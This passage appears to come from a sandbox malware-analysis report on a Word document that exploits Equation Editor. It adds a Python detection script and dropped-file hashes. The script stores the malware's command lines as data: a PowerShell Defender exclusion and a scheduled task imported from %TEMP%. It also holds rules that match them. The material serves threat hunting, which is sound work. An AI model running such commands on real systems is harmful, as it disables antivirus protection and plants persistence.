Reading the tree. EQNEDT32.EXE is a second root rather than a child of WINWORD.EXE because Word starts Equation Editor out of process through COM (the -Embedding switch), so a detection keyed only on WINWORD.EXE parent/child pairs never sees the 552 -> 756 edge, which is the one that matters here. The vbc.exe in C:\Users\Public is the dropped payload, not the .NET Visual Basic compiler. The SysWOW64 image paths for powershell.exe and schtasks.exe, paired with System32 in their command lines, are WOW64 file-system redirection for children of a 32-bit parent, not tampering. The Defender exclusion for C:\Users\Admin\AppData\Roaming\iioqULceCJUGWS.exe and the scheduled task Updates\iioqULceCJUGWS (imported from an XML file in %TEMP%) share a name, and that pair is the persistence to hunt for on other hosts.
-
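The chain above reduces to four checks that fire regardless of the payload's name: Equation Editor spawning anything, execution from C:\Users\Public, PowerShell adding a Defender path exclusion, and schtasks importing a task definition from %TEMP%. The detection below is an added example written for this page, not Triage's logic. It runs those rules over a constructed list of process-creation events modelled on the tree (images, PIDs and command lines are the report's; the parents of WINWORD.EXE and EQNEDT32.EXE are not shown on the page, so explorer.exe and a DCOM svchost.exe with PID 600 and PID 1000 are assumed) and prints each hit with its ancestry, which stops at the first PID missing from the log rather than guessing.

```python
# Constructed process-creation events modelled on the process tree in this
# report. Parents of WINWORD.EXE (assumed explorer.exe, PID 1000) and of the
# COM-activated EQNEDT32.EXE (assumed svchost.exe, PID 600) are not on the page.
EVENTS = [
    {"pid": 1768, "ppid": 1000, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmd": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\POX010-240.docx"'},
    {"pid": 844, "ppid": 1768, "parent_image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "cmd": r"C:\Windows\splwow64.exe 12288"},
    {"pid": 552, "ppid": 600, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmd": r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 756, "ppid": 552, "parent_image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Users\Public\vbc.exe", "cmd": r'"C:\Users\Public\vbc.exe"'},
    {"pid": 904, "ppid": 756, "parent_image": r"C:\Users\Public\vbc.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\iioqULceCJUGWS.exe"'},
    {"pid": 916, "ppid": 756, "parent_image": r"C:\Users\Public\vbc.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iioqULceCJUGWS" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF9.tmp"'},
    {"pid": 1724, "ppid": 756, "parent_image": r"C:\Users\Public\vbc.exe",
     "image": r"C:\Users\Public\vbc.exe", "cmd": r'"C:\Users\Public\vbc.exe"'},
]


def _name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_eqnedt32_child(ev):
    """Equation Editor has no legitimate reason to spawn processes."""
    return _name(ev["parent_image"]) == "eqnedt32.exe"


def rule_defender_exclusion(ev):
    """PowerShell adding a Defender path exclusion (Add-MpPreference -ExclusionPath)."""
    c = ev["cmd"].lower()
    return _name(ev["image"]) == "powershell.exe" and "add-mppreference" in c and "-exclusionpath" in c


def rule_schtasks_xml_from_temp(ev):
    """schtasks /Create importing a task definition from the user's Temp folder."""
    c = ev["cmd"].lower()
    return (_name(ev["image"]) == "schtasks.exe" and "/create" in c
            and "/xml" in c and "\\appdata\\local\\temp\\" in c)


def rule_public_dir_exec(ev):
    """Execution from C:\\Users\\Public, a world-writable drop location."""
    return ev["image"].lower().startswith("c:\\users\\public\\")


RULES = {
    "eqnedt32_spawns_child": rule_eqnedt32_child,
    "defender_exclusion_added": rule_defender_exclusion,
    "schtasks_xml_from_temp": rule_schtasks_xml_from_temp,
    "exec_from_users_public": rule_public_dir_exec,
}


def ancestry(events, pid):
    """'child <- parent <- ...' built only from events we actually have; the
    walk stops at the first PID missing from the log instead of guessing."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " <- ".join(chain)


def evaluate(events):
    """Return sorted (rule, pid, ancestry) tuples for every rule that fires."""
    hits = []
    for ev in events:
        for rule_name, fn in RULES.items():
            if fn(ev):
                hits.append((rule_name, ev["pid"], ancestry(events, ev["pid"])))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid, chain in evaluate(EVENTS):
        print(f"{rule:26} pid={pid:<5} {chain}")
```

Map the event fields onto Sysmon Event ID 1 (Image, ParentImage, CommandLine, ProcessId, ParentProcessId) or the equivalent EDR telemetry; the EQNEDT32 rule is the high-confidence one, the other three are the cheap corroboration that turns a single alert into the full chain.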
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{28E8A8AF-8DFD-40F0-BE31-90032A989923}.FSD
Filesize: 128KB
MD5: c50134d4422876a78d214167c4c50ce4
SHA1: 85b7cb7ba9c23baa5b079dae81b1b9aed03b21fa
SHA256: 7a0eb37d6fdd94b64a64ad7ccdc7fbb77aff0fa6fee37caf86a7eae6d209d8dd
SHA512: 841618abdc9f764f12d6cfb50cf501eb1f6c97ac9dad69695984bfebcc6ff110b979e5943f85aba9dfddc818115792937f776154a1e2ed9f7e406ad33b5ebfe1
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize: 128KB
MD5: b638a146c5fac41943f2100cb366de35
SHA1: 4e50800e6e975b5c46e76d8ac11334be390575ab
SHA256: d3024abfe47cd8065e5c0f0dc6f799aa56b0f36ef2e1714e9566325a862f3744
SHA512: 793772ae56bd75f9b8d7013a9aad4417dd98898d5d343f541ca6f4c5314e0032b65b516683f607daf958f988d4844395c57087ce678371ea319eb5eadd7ef4f8
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{E4E51ABD-4F40-43E5-AE61-978A45D88771}.FSD
Filesize: 128KB
MD5: 563bc5fa0e15c0a1ab39da7919040a4e
SHA1: 76c18b360c7574e3b649f17d1155b4e5b976d231
SHA256: 4e9e33c971fb5f301792c8747653a605124740f323f0752c12639dfd68e80fd3
SHA512: 90b160e94075ebcb8d3d9d1cd6f871e16e38133c6e635160233eb625db9ed82f9b731c818f9a9630a63937ec99a7c3d7467b0dd279f80e432dfa88d9a34537b3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TOS3MI7U\bg[1].doc
(WinInet cache copy of the document Word fetched from http://3324948138/, the URL listed under "Abuses OpenXML format to download file from external location"; this is the second stage that Equation Editor is launched for.)
Filesize: 12KB
MD5: ba628c629f3472e3b57de14e3cdb05d2
SHA1: b492c03cb6824682d575a6b77e3c1c3b7755a331
SHA256: e399cdab404d5046aba55ff32346f96349d482763a3b1c633c9a8fb594f09a17
SHA512: 41fd46f514437a823eef56dd83adf3e8e2f7270ca1a24734a3f639ba3f82db55c170d5056854832602d65e75f2d5772847fbd18e8f9531fc406e8aa62db63cfb
-
(path not shown)
Filesize: 1KB
MD5: 79798868e411b13e70ea6997052e9593
SHA1: f838bf07cde2b69cefefc57854bf5fd5d429fbd1
SHA256: b630e4415962b609bedf2ae6737dcd42d211bc6c47063236dba6648ab9b7ed43
SHA512: c7dba5b354c48f42ee749d1f8c70f146223335609a9286d33786f27d10a509f401c9c4a35467dd13eec598cccd3136ed26d7e297b98fecc79215b70abe8ed115
-
(path not shown)
Filesize: 128KB
MD5: 26a8877f5dcd902e8e614d253fe0624d
SHA1: 84ca48720fd213a0b6950562e900148a331903ec
SHA256: 49f915f6f137bd59eeb4537e1c45cd16fec5ddf2c2dce3fbe04993f976d3dca1
SHA512: cb021c106dea01bb3a294ea4b17bcaee66b8e971a04f40679a4fa88b8b413ffa0b0575391e6e0df510cc0ddd80234285e31b9c334400c0f0741d58adec8290cc
-
(path not shown)
Filesize: 84B
MD5: f6ba86c4321311e89c822975458c513a
SHA1: ad6a18c6038975d70e80a0f9a1a3492b8d2c3a30
SHA256: 4cead7ce9aa7aaa1b5084b59ce763044784de135a7415ac01f8e694654d2c79f
SHA512: ac234cb8afa6e31cb20f6362c80d08bc50279bd9edfff859836b1be8481117b36c8b6befb6c83b1c60e51ea73449eac4b7f2e246066ae2e3f9cb8406707dcb1f
-
(path not shown)
Filesize: 20KB
MD5: ad2222f39399510ad91576f67f54e42b
SHA1: 1aea4fddf5b606ff4765d8048d0a045deaf04128
SHA256: f15f8847aa5acb64d775e2fb79fec9c1482ca1d01922e22c38daa34ee1c5c258
SHA512: 23e4fe9bca3f8d7e41af61f2cd8e84bf97dda34221da244d77e508b870df31d7d9dfdbaa65cc73816e2f1bf37a003eeaea08b35ce3a65084a1d0d954528d7079
-
(path not shown; this entry appears ten times in the report with identical size and hashes)
Filesize: 1.3MB
MD5: fbaac522046f0b2c2ded0ba88585f68a
SHA1: 70f050f44b83c47a41e94de0fd5e88a4f3ba4cf2
SHA256: 85d72481b46dae1f11917c668a2dcb054fd1d72109c90110d5509060c5f1f7e8
SHA512: 4ea98ae5c04c5b2e888b4adfc4cf228b8cb634789d65ea3e6721932375252edc3f9c80ed6dda76fef0142bcd25ad5dacebb8272d2ba6ff69f9af68ee82a31046
-